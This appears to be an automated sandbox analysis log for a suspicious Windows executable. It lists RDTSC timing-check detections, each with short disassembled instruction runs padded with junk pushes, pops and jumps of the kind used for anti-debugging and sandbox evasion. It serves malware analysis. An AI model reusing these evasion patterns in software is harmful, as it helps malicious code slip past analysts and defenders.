Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606A37 second address: 606A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606A3B second address: 606A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606A3F second address: 606A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0513873h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jp 00007F79C0513866h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606BE2 second address: 606BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F79C0CFE2A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 60B748 second address: 60B780 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 jl 00007F79C0513866h 0x0000000d jg 00007F79C0513866h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F79C0513880h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5650E0 second address: 5650F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79C0CFE296h 0x00000008 jmp 00007F79C0CFE29Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5650F9 second address: 565135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F79C0513870h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F79C0513879h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 611B79 second address: 611B7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 612249 second address: 612261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79C0513873h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 612261 second address: 61226E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 61226E second address: 612272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 612272 second address: 612276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 612929 second address: 612948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0513879h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 611051 second address: 61109A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0CFE2A4h 0x00000009 jo 00007F79C0CFE296h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79C0CFE2A9h 0x00000017 jmp 00007F79C0CFE29Fh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 61109A second address: 6110BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F79C0513872h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6189BD second address: 6189DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A6h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 61E344 second address: 61E34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 61E34E second address: 61E355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 61E5E9 second address: 61E5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F79C0513866h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jns 00007F79C0513866h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 62B3D0 second address: 62B3D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 62B3D6 second address: 62B3F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513877h 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 62F648 second address: 62F655 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 62F39F second address: 62F3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 62F3A3 second address: 62F3D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79C0CFE29Eh 0x0000000b pop edx 0x0000000c pushad 0x0000000d jl 00007F79C0CFE2A9h 0x00000013 jmp 00007F79C0CFE2A1h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6447A5 second address: 6447AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6430D4 second address: 64310E instructions: 0x00000000 rdtsc 0x00000002 js 00007F79C0CFE296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F79C0CFE2A5h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79C0CFE2A8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6433EE second address: 6433F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6433F4 second address: 6433FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6433FA second address: 643414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F79C051386Dh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 643414 second address: 643419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6437D9 second address: 6437F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F79C0513866h 0x0000000a pop esi 0x0000000b je 00007F79C051386Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6437F5 second address: 6437FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 643956 second address: 643966 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79C0513866h 0x00000008 jno 00007F79C0513866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 64926E second address: 649272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 649272 second address: 64927C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 64927C second address: 6492AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F79C0CFE29Eh 0x0000000f popad 0x00000010 jc 00007F79C0CFE2A6h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6492AD second address: 6492B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 648F35 second address: 648F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F79C0CFE296h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 648F56 second address: 648F6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6592A2 second address: 6592C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a js 00007F79C0CFE296h 0x00000010 pop edi 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 66643C second address: 666446 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79C051386Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 666446 second address: 66644E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 667D02 second address: 667D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F79C0513866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 667D0E second address: 667D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 66A22A second address: 66A22E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 66A082 second address: 66A08C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F79C0CFE2A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67D3BB second address: 67D3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F79C051386Fh 0x0000000a jmp 00007F79C0513873h 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67D3EC second address: 67D3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67D548 second address: 67D5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0513877h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F79C0513871h 0x00000010 jg 00007F79C0513866h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F79C0513873h 0x0000001d popad 0x0000001e popad 0x0000001f jp 00007F79C051387Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 jnp 00007F79C0513866h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67D5A1 second address: 67D5A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67D6E8 second address: 67D6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F79C0513870h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67D6FF second address: 67D704 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DA1E second address: 67DA22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DCFF second address: 67DD3B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F79C0CFE2A6h 0x00000008 jmp 00007F79C0CFE2A2h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F79C0CFE2C2h 0x00000016 js 00007F79C0CFE2A2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DD3B second address: 67DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DD41 second address: 67DD5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F79C0CFE296h 0x0000000b jne 00007F79C0CFE296h 0x00000011 jl 00007F79C0CFE296h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DE81 second address: 67DE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DFD0 second address: 67DFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DFD8 second address: 67DFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DFE1 second address: 67DFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67DFE5 second address: 67E008 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79C0513875h 0x0000000d jl 00007F79C0513866h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 67E2A9 second address: 67E2AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 68266D second address: 682671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 682671 second address: 682677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6873F6 second address: 687401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F79C0513866h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 687401 second address: 687421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F79C0CFE296h 0x0000000f jmp 00007F79C0CFE29Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 687421 second address: 687425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E8045B second address: 4E80461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E80461 second address: 4E80467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E80467 second address: 4E8046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E8046B second address: 4E804A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79C0513875h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E80504 second address: 4E80508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E80508 second address: 4E8050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA06BD second address: 4EA0706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F79C0CFE2A9h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F79C0CFE29Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F79C0CFE29Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0706 second address: 4EA075F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F79C0513872h 0x00000008 and ax, 4798h 0x0000000d jmp 00007F79C051386Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007F79C0513878h 0x0000001a popad 0x0000001b xchg eax, ecx 0x0000001c jmp 00007F79C0513870h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA075F second address: 4EA0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0763 second address: 4EA0769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0769 second address: 4EA07F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b jmp 00007F79C0CFE2A4h 0x00000010 mov bx, cx 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 jmp 00007F79C0CFE29Ch 0x0000001a push eax 0x0000001b jmp 00007F79C0CFE29Bh 0x00000020 xchg eax, esi 0x00000021 jmp 00007F79C0CFE2A6h 0x00000026 lea eax, dword ptr [ebp-04h] 0x00000029 jmp 00007F79C0CFE2A0h 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F79C0CFE2A7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA07F3 second address: 4EA0815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0815 second address: 4EA086D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, ebx 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F79C0CFE29Bh 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dx, 7026h 0x0000001a pushfd 0x0000001b jmp 00007F79C0CFE2A7h 0x00000020 adc ax, 42AEh 0x00000025 jmp 00007F79C0CFE2A9h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA086D second address: 4EA0873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA08D1 second address: 4EA091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 pushfd 0x00000014 jmp 00007F79C0CFE2A4h 0x00000019 sbb ah, 00000078h 0x0000001c jmp 00007F79C0CFE29Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0980 second address: 4EA09B0 instructions: 0x00000000 rdtsc 0x00000002 mov cx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, 3EDCh 0x0000000b popad 0x0000000c pop esi 0x0000000d jmp 00007F79C051386Bh 0x00000012 leave 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F79C0513875h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA09B0 second address: 4E90188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F79C0CFE29Dh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e retn 0004h 0x00000011 nop 0x00000012 sub esp, 04h 0x00000015 xor ebx, ebx 0x00000017 cmp eax, 00000000h 0x0000001a je 00007F79C0CFE3FAh 0x00000020 mov dword ptr [esp], 0000000Dh 0x00000027 call 00007F79C57BA59Eh 0x0000002c mov edi, edi 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F79C0CFE2A7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90188 second address: 4E9021F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79C051386Fh 0x00000009 jmp 00007F79C0513873h 0x0000000e popfd 0x0000000f mov ax, 92DFh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F79C0513870h 0x0000001e add ax, 6D48h 0x00000023 jmp 00007F79C051386Bh 0x00000028 popfd 0x00000029 mov bh, ch 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov eax, 0797B4B7h 0x00000033 call 00007F79C051386Ch 0x00000038 push esi 0x00000039 pop edx 0x0000003a pop ecx 0x0000003b popad 0x0000003c xchg eax, ebp 0x0000003d jmp 00007F79C051386Dh 0x00000042 mov ebp, esp 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov al, dh 0x00000049 call 00007F79C0513874h 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
